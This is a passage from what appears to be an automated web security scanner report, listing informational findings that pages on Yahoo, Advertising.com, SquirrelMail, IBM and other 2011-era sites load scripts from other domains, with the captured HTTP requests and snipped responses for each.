</script><script charset="utf-8" type="text/javascript" src="http://l.yimg.com/a/lib/uh/15/js/uh_rsa-1.0.9.js"></script>
...[SNIP]...
<!--QYZ ,;;;2115823648;;-->
               
               
<script language="javascript" src="http://l.yimg.com/a/combo?omg/js/omg-main-2.1.1.js&omg/js/menu-1.1.0.js&omg/js/deferloader-1.0.0.js"></script>
<script type="text/javascript" src="http://l.yimg.com/us.js.yimg.com/lib/yui/3.1.1/build/yui/yui-min.js"></script>
...[SNIP]...
</script>
       

<script type="text/javascript" src="http://l.yimg.com/d/combo?yui/2.8.0/build/yahoo/yahoo-min.js&yui/2.8.0/build/event/event-min.js&yui/2.8.0/build/dom/dom-min.js&yui/2.8.0/build/imageloader/imageloader-min.js&yui/2.8.0/build/get/get-min.js&yui/2.8.0/build/connection/connection-min.js&yui/2.8.0/build/animation/animation-min.js&yui/2.8.0/build/json/json-min.js&yui/2.8.0/build/container/container_core-min.js&yui/2.8.0/build/element/element-min.js&yui/2.8.0/build/cookie/cookie-min.js&media/m/social_buttons/social-buttons-easy-min-3732.js&media/phugc/mwphcom_min_r1411.js&media/entxhrcmts/interceptor-1.0.1.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://l.yimg.com/d/lib/media/entxhrcmts/entxhrcmts-1.0.4.js"></script>
...[SNIP]...

18.115. http://pro.tweetmeme.com/button.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pro.tweetmeme.com
Path:   /button.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /button.js?url=http%3A%2F%2Fomg.yahoo.com%2Fphotos%2Fwhat-were-they-thinking%2F5203&style=compact&service=bit.ly HTTP/1.1
Host: pro.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/photos/what-were-they-thinking/5203
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user_unique_ident=4e711fdbe071e7.74387718-77ae10737605aa42c6d7ecff2ae753b4

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 17 Sep 2011 00:55:03 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
X-Url-Lookup: OrAdd (44)
X-Pro-Served-In: 0.0018379688262939
X-Served-By: h02
Content-Length: 6464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <meta content="tex
...[SNIP]...
</style>

<script type="text/javascript" src="http://l.yimg.com/d/combo?yui/3.1.1/build/yui/yui-min.js&amp;ult/ylc_1.9.js"></script>
...[SNIP]...

18.116. http://r1-ads.ace.advertising.com/site=791296/size=300250/u=2/bnum=67593853/hr=0/hl=12/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=791296/size=300250/u=2/bnum=67593853/hr=0/hl=12/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /site=791296/size=300250/u=2/bnum=67593853/hr=0/hl=12/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref= HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/passback/iframe/221/tmz/300x250/6/meld.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1076845.791296.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 00:57:14 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 567
Date: Sat, 17 Sep 2011 00:57:13 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 00:57:14 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write("<SCRIPT language='JavaScript1.1' SRC='http://ad.doubleclick.net/adj/N5739.140101.AD.COM/B5822790.3;sz=300x250;pc=[TPAS_ID];click=http://r1-ads.ace.advertising.com/click/site=0000791296/mnum=0001076845/cstr=67593853=_4e73f069,2688307180,791296^1076845^1184^0,1_/xsxdata=$XSXDATA/bnum=67593853/optn=64?trg=;ord=2688307180?'></SCRIPT>
...[SNIP]...

18.117. http://r1-ads.ace.advertising.com/site=804034/size=728090/u=2/bnum=48830520/hr=0/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F221%252Ftmz%252F728x90%252Fhomepage_btf%253Ft%253D1316238825238%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253Dhttp%25253A%25252F%25252Fwww.tmz.com%25252F%2526refer%253D  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=804034/size=728090/u=2/bnum=48830520/hr=0/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F221%252Ftmz%252F728x90%252Fhomepage_btf%253Ft%253D1316238825238%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253Dhttp%25253A%25252F%25252Fwww.tmz.com%25252F%2526refer%253D

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /site=804034/size=728090/u=2/bnum=48830520/hr=0/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F221%252Ftmz%252F728x90%252Fhomepage_btf%253Ft%253D1316238825238%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253Dhttp%25253A%25252F%25252Fwww.tmz.com%25252F%2526refer%253D HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?wT8nBZMQIwBWUEQAAAAAAEAgEgAAAAAAAgAAAAYAAAAAAP8AAAAGFEz4GAAAAAAAUvgYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD1DhMAAAAAAAIAAgAAAAAAmpmZmZmZ2T-amZmZmZnZP5qZmZmZmdk.mpmZmZmZ2T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABMCYyQztO8ClmeR2rwo8Ab3j-oNvoGtMiyJOdrAAAAAA==,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F221%2Ftmz%2F728x90%2Fhomepage_btf%3Ft%3D1316238825238,Z%3D728x90%26_salt%3D2029454794%26anmember%3D514%26anprice%3D%26fo%3D%26hp%3D0%26ht%3Djs%26hu%3D%26m%3D0%26r%3D0%26refer%3D%26s%3D2298003%26tz%3D300%26url%3Dhttp%253A%252F%252Fwww.tmz.com%252F,5257a1a2-e0c7-11e0-91e5-78e7d15f7c8c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1076846.804034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 00:52:38 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 566
Date: Sat, 17 Sep 2011 00:52:37 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 00:52:38 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write("<SCRIPT language='JavaScript1.1' SRC='http://ad.doubleclick.net/adj/N5739.140101.AD.COM/B5822790.2;sz=728x90;pc=[TPAS_ID];click=http://r1-ads.ace.advertising.com/click/site=0000804034/mnum=0001076846/cstr=48830520=_4e73ef55,7812332526,804034^1076846^1184^0,1_/xsxdata=$XSXDATA/bnum=48830520/optn=64?trg=;ord=7812332526?'></SCRIPT>
...[SNIP]...

18.118. http://squirrelmail.org/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://squirrelmail.org
Path:   /index.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /index.php HTTP/1.1
Host: squirrelmail.org
Proxy-Connection: keep-alive
Referer: http://squirrelmail.org/plugins.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:50:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny13
Vary: Accept-Encoding
Content-Length: 13431
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>SquirrelMail - Webmail for Nuts!</title>
<link rel="stylesheet"
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_012802144112468634923%3Ap8qwoz07y-m&amp;lang="></script>
...[SNIP]...

18.119. http://squirrelmail.org/plugins.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://squirrelmail.org
Path:   /plugins.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins.php HTTP/1.1
Host: squirrelmail.org
Proxy-Connection: keep-alive
Referer: http://squirrelmail.org/wiki/MailServerIMAPProblem
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:50:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny13
Vary: Accept-Encoding
Content-Length: 7074
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>SquirrelMail - Webmail for Nuts!</title>
<link rel="stylesheet"
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_012802144112468634923%3Ap8qwoz07y-m&amp;lang="></script>
...[SNIP]...

18.120. http://squirrelmail.org/support/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://squirrelmail.org
Path:   /support/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /support/ HTTP/1.1
Host: squirrelmail.org
Proxy-Connection: keep-alive
Referer: http://squirrelmail.org/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:50:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny13
Vary: Accept-Encoding
Content-Length: 4546
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>SquirrelMail - Webmail for Nuts!</title>
<link rel="stylesheet"
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_012802144112468634923%3Ap8qwoz07y-m&amp;lang="></script>
...[SNIP]...

18.121. http://squirrelmail.org/wiki/MailServerIMAPProblem  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://squirrelmail.org
Path:   /wiki/MailServerIMAPProblem

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wiki/MailServerIMAPProblem HTTP/1.1
Host: squirrelmail.org
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/?q=imap+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:42:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny13
Expires: Fri, 16 Sep 2011 19:42:44 GMT
Last-Modified: Fri, 16 Sep 2011 19:42:44 GMT
Vary: Accept-Encoding
Content-Length: 17089
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>SquirrelMail - Webmail for Nuts!</title>
<link rel="stylesheet"
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_012802144112468634923%3Ap8qwoz07y-m&amp;lang="></script>
...[SNIP]...

18.122. http://us.adserver.yahoo.com/a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.adserver.yahoo.com
Path:   /a

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /a?f=2115823648&p=yahoo&l=MIP&c=h&bg=ffffff&rand=1200349473225&at=content%3D%22no_expandable%22 HTTP/1.1
Host: us.adserver.yahoo.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/photos/what-were-they-thinking/5203
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223.1071929@2@223.3078101@1@234

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:54:21 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private, no-store, max-age=0
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 2299

<html><head><base target="_top"></head>
<body bgcolor="ffffff">
<script>var mrec_target="_blank";var mrec_URL=new Array();mrec_URL[1]="http://global.ard.yahoo.com/SIG=15qbgeh62/M=731609.13380281.1348
...[SNIP]...
</script><script src="http://ads.yimg.com/a/a/1-/jscodes/flashx/mrec20100406.js"></script>
...[SNIP]...

18.123. http://weather.yahoo.com/badge/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weather.yahoo.com
Path:   /badge/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /badge/?id=2354490&u=f&t=default&l=tiny HTTP/1.1
Host: weather.yahoo.com
Proxy-Connection: keep-alive
Referer: http://www.astac.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:45:54 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Cache-Control: private
Content-Length: 5900

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head>
   <title>Yahoo! Weather Widget | Badge - Yahoo! Weather</title>
   <link rel="stylesh
...[SNIP]...
</div><script src="http://us.js.yimg.com/lib/rapid/rapid_2.0.0.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

18.124. http://www-304.ibm.com/support/operations/us/en/invoicespayments  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www-304.ibm.com
Path:   /support/operations/us/en/invoicespayments

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /support/operations/us/en/invoicespayments?lnk=mhmy HTTP/1.1
Host: www-304.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/us/en/
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.ibm.com/developerworks/forums/thread.jspa%3FmessageID%3D14644760; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; mbox=check#true#1316221073|session#1316221012167-554408#1316222873|PC#1316221012167-554408.19#1317430615

Response

HTTP/1.1 200 OK
content-type: text/html; charset=UTF-8
date: Fri, 16 Sep 2011 19:57:29 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server/2.0.47.1-PK53584 Apache/2.0.47 (Unix) DAV/2
Content-Length: 21004


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang=
...[SNIP]...
<link href="https://a248.e.akamai.net/f/248/47542/30d/www.ibm.com/common/cdn/v16/css/print.css" media="print" rel="stylesheet" title="www" type="text/css"/>
<script src="https://a248.e.akamai.net/f/248/47542/30d/www.ibm.com/common/cdn/js/ibmcommon.js" type="text/javascript">//</script>
...[SNIP]...

18.125. http://www-304.ibm.com/support/operations/us/en/orderdelivery  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www-304.ibm.com
Path:   /support/operations/us/en/orderdelivery

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /support/operations/us/en/orderdelivery?lnk=mhmy HTTP/1.1
Host: www-304.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/us/en/
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.ibm.com/developerworks/forums/thread.jspa%3FmessageID%3D14644760; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; mbox=check#true#1316221073|session#1316221012167-554408#1316222873|PC#1316221012167-554408.19#1317430615

Response

HTTP/1.1 200 OK
content-type: text/html; charset=UTF-8
date: Fri, 16 Sep 2011 19:57:24 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server/2.0.47.1-PK53584 Apache/2.0.47 (Unix) DAV/2
cache-control: no-cache="set-cookie,set-cookie2"
expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=0000ndqbkupauFWNanvu6jEGCI-:115n6mauu; Path=/
Content-Length: 19977


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang=
...[SNIP]...
<link href="https://a248.e.akamai.net/f/248/47542/30d/www.ibm.com/common/cdn/v16/css/print.css" media="print" rel="stylesheet" title="www" type="text/css"/>
<script src="https://a248.e.akamai.net/f/248/47542/30d/www.ibm.com/common/cdn/js/ibmcommon.js" type="text/javascript">//</script>
...[SNIP]...

18.126. http://www.actvalue.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.actvalue.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.actvalue.com
Proxy-Connection: keep-alive
Referer: http://www.radius-server.net/aradial-radius-server-billing-partners-inner.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache
Pragma: no-cache,no-cache
Content-Type: text/html
Expires: Sun, 31 Dec 1989 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:45:04 GMT
Content-Length: 42041

<html><head><title>ActValue Consulting &#38; Solutions - Servizi di consulenza e Information Technology - progettazione, realizzazione ed integrazione di tecnologie RFId - Sviluppo e commercializzazio
...[SNIP]...
<link rel="stylesheet" href="/images/stile.css" type="text/css"><script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.4.min.js"></script>
...[SNIP]...
</script><script type="text/javascript" language="JavaScript1.2" src="http://s19.sitemeter.com/js/counter.js?site=s19actvalue"></script>
...[SNIP]...

18.127. http://www.actvalue.com/pages/asp/editorial/ps_rfid.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.actvalue.com
Path:   /pages/asp/editorial/ps_rfid.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pages/asp/editorial/ps_rfid.asp?d=Tecnologia_RFId___Radio_Frequency_Identification___Tecnologia_attiva_e_passiva___Componenti_principali__trasponder__tag___antenna__middleware HTTP/1.1
Host: www.actvalue.com
Proxy-Connection: keep-alive
Referer: http://www.actvalue.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSSRBDSBS=MIBFIBDBGCMIPOEOIPCEIHHM

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache
Pragma: no-cache,no-cache
Content-Type: text/html
Expires: Sun, 31 Dec 1989 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:45:36 GMT
Content-Length: 33643

<html><head><title>Tecnologia RFId - Radio Frequency Identification - Tecnologia attiva e passiva - Componenti principali: trasponder (tag), antenna, middleware</title><meta http-equiv="X-UA-Compatibl
...[SNIP]...
<link rel="stylesheet" href="/images/stile.css" type="text/css"><script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.4.min.js"></script>
...[SNIP]...
</script><script type="text/javascript" language="JavaScript1.2" src="http://s19.sitemeter.com/js/counter.js?site=s19actvalue"></script>
...[SNIP]...

18.128. http://www.alepo.com/isp-billing.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alepo.com
Path:   /isp-billing.shtml

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /isp-billing.shtml HTTP/1.1
Host: www.alepo.com
Proxy-Connection: keep-alive
Referer: http://www.radius-server.com/products.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: alepo_cookie=http%3A//www.radius-server.com/%23%23%23%23undefined%23%23%23%239%5C16%5C111%23%23%23%23%20%23%23%23%23%23%23%23%23-5%3A0; __utma=18704489.631393116.1316220585.1316220585.1316220585.1; __utmb=18704489.3.10.1316220585; __utmc=18704489; __utmz=18704489.1316220585.1.1.utmcsr=radius-server.com|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:49:10 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 17320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script type="text/javascr
...[SNIP]...
</script>
<script language="JavaScript" src="http://j.maxmind.com/app/geoip.js"></script>
...[SNIP]...

18.129. http://www.alepo.com/radius-server.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alepo.com
Path:   /radius-server.shtml

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /radius-server.shtml HTTP/1.1
Host: www.alepo.com
Proxy-Connection: keep-alive
Referer: http://www.radius-server.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
